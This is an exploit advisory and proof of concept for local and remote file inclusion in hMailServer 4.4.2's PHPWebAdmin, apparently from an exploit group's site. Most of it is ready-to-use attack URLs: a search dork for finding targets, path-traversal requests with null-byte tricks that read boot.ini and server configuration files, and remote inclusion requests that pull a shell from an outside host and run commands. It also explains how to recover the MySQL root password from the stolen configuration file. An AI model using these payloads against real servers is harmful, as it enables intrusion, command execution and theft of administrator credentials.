hMAilServer 4.4.2 (PHPWebAdmin) local & remote file inclusion poc by Nine:Situations:Group::strawdog -------------------------------------------------------------------------------- our site: http://retrogod.altervista.org software site: http://www.hmailserver.com/ description: http://en.wikipedia.org/wiki/HMailServer -------------------------------------------------------------------------------- google dork: "PHPWebAdmin for hMailServer" intitle:PHPWebAdmin -site:hmailserver.com -dork poc: regardless of register_globals & magic_quotes_gpc: http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../../boot.ini%00 http://hostname/path_to_webadmin/index.php?page=background/../../Bin/hMailServer.INI%00 http://hostname/path_to_webadmin/index.php?index.php?page=background/../../MySQL/my.ini%00 http://hostname/path_to_webadmin/index.php?index.php?page=background/../../../../../../../../../Program+Files/hmailserver/Bin/hmailserver.ini%00 with register_globals = on: (prepare a functions.php folder on somehost.com with an index.html with your shell inside on a php enabled server, otherwise a functions.php shell on a php disabled one) http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/&cmd=dir with register_globals = on & magic_quotes_gpc = off : http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\boot.ini%00 http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/shell.txt%00&cmd=dir http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\Program+Files\hMailServer\Bin\hMailServer.INI%00 http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=../Bin/hMailServer.INI%00 "Bin" folder can be found in a different location, disclose the path by simply calling: http://hostname/path_to_webadmin/initialize.php interesting file: hMailServer.INI - contains two interesting fields: - the "Administrator password" crypted with md5, - by having knowledge of that you can calculate the MySQL root password, specified in the "password" field. You can do this by using the /Addons/Utilities/DecryptBlowfish.vbs script (*) vulnerable code, index.php: